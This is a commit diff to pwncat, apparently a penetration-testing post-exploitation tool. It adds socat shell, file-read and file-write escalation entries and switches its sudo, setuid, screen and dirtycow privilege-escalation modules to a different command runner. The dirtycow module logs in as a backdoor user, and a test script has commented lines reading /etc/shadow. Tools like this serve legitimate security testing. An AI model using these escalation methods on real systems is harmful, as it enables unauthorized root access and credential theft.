Changed privesc methods to use run() rather than process()... seems to work?? Added socat as a gtfobins

data/gtfobins.json

@@ -11,6 +11,7 @@
 			"payload": "{command} 2>/dev/null",
 			// This is used to pass arguments to the application (auto-merged
 			// into "{command}".
+
 			// IF YOUR COMMAND TAKES ARGUMENTS, YOU MUST SUPPLY THEM HERE.
 			"args": ["if={lfile}"],
 			// Prepends arguments, if any to the "args" for setuid context.
@@ -261,13 +262,41 @@
 			"type": "shell",
 			"payload": "TF=$({mktemp}); echo 'system(\"{shell}\")' > $TF; {command}",
 			"args": ["--no-stop", "-q", "$TF"],
-			"exit": "exit"
+			"exit": "exit\n"
 		},
 		{
 			"type": "read",
 			"payload": "TF=$({mktemp}); echo 'system(\"{cat} {lfile}\")' > $TF; {command}",
 			"args": ["--no-stop", "-q", "$TF"],
-			"exit": "exit"
+			"exit": "exit\n"
 		}
+	],
+	"socat": [
+		{
+			"type": "shell",
+			"payload": "{command}",
+			"args": ["STDIN", "EXEC:{shell}"],
+			"exit": "exit\n"
+		},
+		{
+			"type": "read",
+			"payload": "{command}",
+			"args": ["-u", "FILE:{lfile}", "STDOUT"]
+		},
+		{
+			"type": "write",
+			"stream": "print",
+			"payload": "{command} 2>/dev/null",
+			"args": ["-u", "STDIN", "CREATE:{lfile}"],
+			"exit": "{ctrl_d}"
+		},
+		{
+			"type": "write",
+			"stream": "base64",
+			"payload": "{base64} -d | {command} 2>/dev/null",
+			"args": ["-u", "STDIN", "CREATE:{lfile}"],
+			"exit": "{ctrl_d}"
+		}
+
 	]
 }

gtfobinstest.py

@@ -16,5 +16,24 @@ def which(path: str, quote=False):
 
 gtfo = GTFOBins("data/gtfobins.json", which)
 
-all_binaries = list(gtfo.iter_methods(Capability.SHELL))
+
-print(all_binaries[0].build(shell="/bin/bash", suid=True))
+binary_to_test = "socat"
+capabilities_to_test = Capability.WRITE
+our_shell = "/bin/bash"
+
+socat = gtfo.find_binary(binary_to_test)
+print(socat)
+print(vars(socat))
+
+methods = socat.iter_methods(
+    which(binary_to_test), caps=capabilities_to_test, stream=None
+)
+for method in methods:
+    print(method)
+    print(method.build(lfile="/tmp/test", data="hello")[0])
+    break
+    # print(method.build(shell=our_shell)[0])
+    # print(method.build(lfile="/etc/shadow", suid=True)[0])
+
+# all_binaries = list(gtfo.iter_methods(Capability.SHELL))
+# print(all_binaries[0].build(shell="/bin/bash", suid=True))

pwncat/privesc/__init__.py

@@ -21,8 +21,8 @@ from pwncat import util
 
 # privesc_methods = [SetuidMethod, SuMethod]
 # privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod]
-privesc_methods = [SuMethod, SudoMethod, ScreenMethod, SetuidMethod]
+# privesc_methods = [SuMethod, SudoMethod, SetuidMethod]
-# privesc_methods = [SuMethod, SudoMethod]
+privesc_methods = [SuMethod, SetuidMethod]
 
 
 class Finder:
@@ -302,8 +302,11 @@ class Finder:
 
                     # Check if we ended up in a sub-shell without escalating
                     if self.pty.getenv("SHLVL") != shlvl:
+
                         # Get out of this subshell. We don't need it
-                        self.pty.process(exit_script, delim=False)
+                        # self.pty.process(exit_script, delim=False)
+                        self.pty.run(exit_script, wait=False)
+                        self.pty.recvuntil("\n")
 
                         # Clean up whatever mess was left over
                         self.pty.flush_output()

pwncat/privesc/dirtycow.py

@@ -90,7 +90,9 @@ class DirtycowMethod(Method):
             raise PrivescError("backdoor user not created")
 
         # Become the new user!
-        self.pty.process(f"su {self.pty.privesc.backdoor_user_name}", delim=False)
+        self.pty.run(f"su {self.pty.privesc.backdoor_user_name}", wait=False)
+        self.pty.recvuntil(": ")
+
         self.pty.client.send(self.pty.privesc.backdoor_password.encode("utf-8") + b"\n")
 
         return "exit"

pwncat/privesc/screen.py

@@ -148,7 +148,7 @@ class ScreenMethod(Method):
         self.pty.run("popd")
 
         # Start the root shell!
-        self.pty.process(f"{rootshell}", delim=False)
+        self.pty.run(f"{rootshell}", wait=False)
 
         # Remove the evidence
         self.pty.run(f"unlink {libhack_so} {libhack_c} {rootshell_c} {rootshell}")

pwncat/privesc/setuid.py

@@ -93,7 +93,8 @@ class SetuidMethod(Method):
         payload, input_data, exit_cmd = method.build(shell=self.pty.shell, suid=True)
 
         # Run the start commands
-        self.pty.process(payload, delim=False)
+        # self.pty.process(payload, delim=False)
+        self.pty.run(payload, wait=False)
 
         # Send required input
         self.pty.client.send(input_data.encode("utf-8"))

pwncat/privesc/sudo.py

@@ -212,7 +212,8 @@ class SudoMethod(Method):
         )
 
         # Run the commands
-        self.pty.process(payload, delim=True)
+        # self.pty.process(payload, delim=True)
+        self.pty.run(payload, wait=True)
 
         # This will check if the password is needed, and attempt to send it or
         # fail, and return